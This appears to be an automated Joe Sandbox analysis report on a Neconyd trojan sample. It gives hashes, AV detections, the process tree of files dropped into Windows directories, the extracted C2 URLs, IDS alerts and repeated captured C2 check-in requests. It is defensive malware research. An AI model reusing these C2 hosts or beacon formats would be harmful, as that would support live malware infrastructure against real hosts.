Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nNX5KYQRhg.exe

Overview

General Information

Sample name:nNX5KYQRhg.exe
renamed because original name is a hash value
Original sample name:682abf7611b349bb614207e0fcca057ab84389a6.exe
Analysis ID:1546830
MD5:44a881b87bb2d5dfe7062b9a7538425f
SHA1:682abf7611b349bb614207e0fcca057ab84389a6
SHA256:fc22b8c7e16c145772129e466d1977f14f09c1302da688eb96863e409cbb6a58
Tags:exeReversingLabsuser-NDA0E
Infos:

Detection

Neconyd
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Neconyd
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • nNX5KYQRhg.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\nNX5KYQRhg.exe" MD5: 44A881B87BB2D5DFE7062B9A7538425F)
    • omsecor.exe (PID: 3756 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: DCC8263D314F19A3A35E32EDFCCDC942)
      • omsecor.exe (PID: 1268 cmdline: C:\Windows\System32\omsecor.exe MD5: 1FB6FB78751B952FE1D6BEBA89C93830)
        • omsecor.exe (PID: 3908 cmdline: C:\Windows\SysWOW64\omsecor.exe /nomove MD5: 1FB6FB78751B952FE1D6BEBA89C93830)
  • cleanup
{"C2 url": ["http://mkkuei4kdsz.com/", "http://ow5dirasuek.com/", "ht:/w.irsf.o/", "ht:/r.irsf.o/", "http://lousta.net/"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: nNX5KYQRhg.exe PID: 2848JoeSecurity_NeconydYara detected NeconydJoe Security
    Process Memory Space: omsecor.exe PID: 3756JoeSecurity_NeconydYara detected NeconydJoe Security
      Process Memory Space: omsecor.exe PID: 1268JoeSecurity_NeconydYara detected NeconydJoe Security
        Process Memory Space: omsecor.exe PID: 3908JoeSecurity_NeconydYara detected NeconydJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T16:22:19.281249+010020229301A Network Trojan was detected172.202.163.200443192.168.2.649763TCP
          2024-11-01T16:22:57.393256+010020229301A Network Trojan was detected172.202.163.200443192.168.2.649973TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T16:22:01.694283+010020169981A Network Trojan was detected192.168.2.649709193.166.255.17180TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T16:22:20.910667+010020181411A Network Trojan was detected52.34.198.22980192.168.2.649776TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T16:22:20.910667+010020377711A Network Trojan was detected52.34.198.22980192.168.2.649776TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T16:21:58.969242+010020157861Malware Command and Control Activity Detected192.168.2.650009193.166.255.17180TCP
          2024-11-01T16:22:10.199354+010020157861Malware Command and Control Activity Detected192.168.2.649709193.166.255.17180TCP
          2024-11-01T16:22:18.801892+010020157861Malware Command and Control Activity Detected192.168.2.649727193.166.255.17180TCP
          2024-11-01T16:22:19.623901+010020157861Malware Command and Control Activity Detected192.168.2.64976915.197.204.5680TCP
          2024-11-01T16:22:20.790141+010020157861Malware Command and Control Activity Detected192.168.2.64977652.34.198.22980TCP
          2024-11-01T16:22:29.863054+010020157861Malware Command and Control Activity Detected192.168.2.649788193.166.255.17180TCP
          2024-11-01T16:22:38.613596+010020157861Malware Command and Control Activity Detected192.168.2.649830193.166.255.17180TCP
          2024-11-01T16:22:39.356294+010020157861Malware Command and Control Activity Detected192.168.2.64987915.197.204.5680TCP
          2024-11-01T16:22:40.327774+010020157861Malware Command and Control Activity Detected192.168.2.64988552.34.198.22980TCP
          2024-11-01T16:22:48.943456+010020157861Malware Command and Control Activity Detected192.168.2.649891193.166.255.17180TCP
          2024-11-01T16:22:57.731117+010020157861Malware Command and Control Activity Detected192.168.2.649938193.166.255.17180TCP
          2024-11-01T16:22:58.006313+010020157861Malware Command and Control Activity Detected192.168.2.64987915.197.204.5680TCP
          2024-11-01T16:22:58.961028+010020157861Malware Command and Control Activity Detected192.168.2.64998352.34.198.22980TCP
          2024-11-01T16:23:07.664946+010020157861Malware Command and Control Activity Detected192.168.2.649989193.166.255.17180TCP
          2024-11-01T16:23:16.258859+010020157861Malware Command and Control Activity Detected192.168.2.649995193.166.255.17180TCP
          2024-11-01T16:23:16.999344+010020157861Malware Command and Control Activity Detected192.168.2.64999615.197.204.5680TCP
          2024-11-01T16:23:17.946497+010020157861Malware Command and Control Activity Detected192.168.2.64999752.34.198.22980TCP
          2024-11-01T16:23:26.666239+010020157861Malware Command and Control Activity Detected192.168.2.649998193.166.255.17180TCP
          2024-11-01T16:23:35.272306+010020157861Malware Command and Control Activity Detected192.168.2.649999193.166.255.17180TCP
          2024-11-01T16:23:36.587988+010020157861Malware Command and Control Activity Detected192.168.2.65000115.197.204.5680TCP
          2024-11-01T16:23:37.569661+010020157861Malware Command and Control Activity Detected192.168.2.65000252.34.198.22980TCP
          2024-11-01T16:23:46.286758+010020157861Malware Command and Control Activity Detected192.168.2.650003193.166.255.17180TCP
          2024-11-01T16:23:55.051681+010020157861Malware Command and Control Activity Detected192.168.2.650004193.166.255.17180TCP
          2024-11-01T16:23:55.834896+010020157861Malware Command and Control Activity Detected192.168.2.65000515.197.204.5680TCP
          2024-11-01T16:23:56.826488+010020157861Malware Command and Control Activity Detected192.168.2.65000652.34.198.22980TCP
          2024-11-01T16:24:05.543153+010020157861Malware Command and Control Activity Detected192.168.2.650007193.166.255.17180TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: nNX5KYQRhg.exeAvira: detected
          Source: C:\Users\user\AppData\Roaming\omsecor.exeAvira: detection malicious, Label: TR/SpyVoltar.absza
          Source: C:\Windows\SysWOW64\omsecor.exeAvira: detection malicious, Label: TR/SpyVoltar.absza
          Source: nNX5KYQRhg.exeMalware Configuration Extractor: Neconyd {"C2 url": ["http://mkkuei4kdsz.com/", "http://ow5dirasuek.com/", "ht:/w.irsf.o/", "ht:/r.irsf.o/", "http://lousta.net/"]}
          Source: nNX5KYQRhg.exeReversingLabs: Detection: 86%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Roaming\omsecor.exeJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\omsecor.exeJoe Sandbox ML: detected
          Source: nNX5KYQRhg.exeJoe Sandbox ML: detected
          Source: nNX5KYQRhg.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040ABD9 FindFirstFileW,FindClose,0_2_0040ABD9
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00408248
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040ABD9 FindFirstFileW,FindClose,5_2_0040ABD9
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,5_2_00408248

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49709 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49776 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49769 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49727 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49788 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49879 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49830 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49885 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49891 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49983 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49989 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49998 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50004 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49996 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49999 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50005 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50007 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50003 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49997 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50001 -> 15.197.204.56:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49995 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50006 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49938 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50002 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50009 -> 193.166.255.171:80
          Source: Malware configuration extractorURLs: http://mkkuei4kdsz.com/
          Source: Malware configuration extractorURLs: http://ow5dirasuek.com/
          Source: Malware configuration extractorURLs: ht:/w.irsf.o/
          Source: Malware configuration extractorURLs: ht:/r.irsf.o/
          Source: Malware configuration extractorURLs: http://lousta.net/
          Source: global trafficHTTP traffic detected: GET /404/921.html HTTP/1.1From: 133749481198045666Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=beHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /97/341.html HTTP/1.1From: 133749481198045666Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=beHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /922/501.html HTTP/1.1From: 133749481198045666Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=beHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /158/381.html HTTP/1.1From: 133749481198045666Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=beHost: ow5dirasuek.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /719/772.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /106/649.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /87/444.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /65/168.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474540|1730474540|0|1|0
          Source: global trafficHTTP traffic detected: GET /810/632.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /639/772.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /126/170.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /524/9.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474560|1730474540|10|2|0
          Source: global trafficHTTP traffic detected: GET /128/758.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /107/805.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /932/965.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /913/437.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474578|1730474540|14|3|0
          Source: global trafficHTTP traffic detected: GET /883/755.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /761/49.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /477/877.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /503/726.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474597|1730474540|16|4|0
          Source: global trafficHTTP traffic detected: GET /526/179.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /171/705.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /558/583.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /640/808.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474617|1730474540|18|5|0
          Source: global trafficHTTP traffic detected: GET /761/32.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /691/461.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 193.166.255.171 193.166.255.171
          Source: Joe Sandbox ViewIP Address: 52.34.198.229 52.34.198.229
          Source: Joe Sandbox ViewASN Name: FUNETASFI FUNETASFI
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
          Source: Network trafficSuricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.6:49709 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.6:49776
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.6:49776
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.6:49973
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.6:49763
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,0_2_00407036
          Source: global trafficHTTP traffic detected: GET /404/921.html HTTP/1.1From: 133749481198045666Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=beHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /97/341.html HTTP/1.1From: 133749481198045666Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=beHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /922/501.html HTTP/1.1From: 133749481198045666Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=beHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /158/381.html HTTP/1.1From: 133749481198045666Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=beHost: ow5dirasuek.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /719/772.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /106/649.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /87/444.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /65/168.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474540|1730474540|0|1|0
          Source: global trafficHTTP traffic detected: GET /810/632.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /639/772.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /126/170.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /524/9.html HTTP/1.1From: 133749481401170560Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]`Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474560|1730474540|10|2|0
          Source: global trafficHTTP traffic detected: GET /128/758.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /107/805.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /932/965.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /913/437.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474578|1730474540|14|3|0
          Source: global trafficHTTP traffic detected: GET /883/755.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /761/49.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /477/877.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /503/726.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474597|1730474540|16|4|0
          Source: global trafficHTTP traffic detected: GET /526/179.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /171/705.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /558/583.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /640/808.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474617|1730474540|18|5|0
          Source: global trafficHTTP traffic detected: GET /761/32.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /691/461.html HTTP/1.1From: 133749481401170560Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtnsHost: lousta.netConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: lousta.net
          Source: global trafficDNS traffic detected: DNS query: mkkuei4kdsz.com
          Source: global trafficDNS traffic detected: DNS query: ow5dirasuek.com
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/106/649.html
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/106/649.htmlo
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/106/649.htmlshqos.dll.mui
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/107/805.html
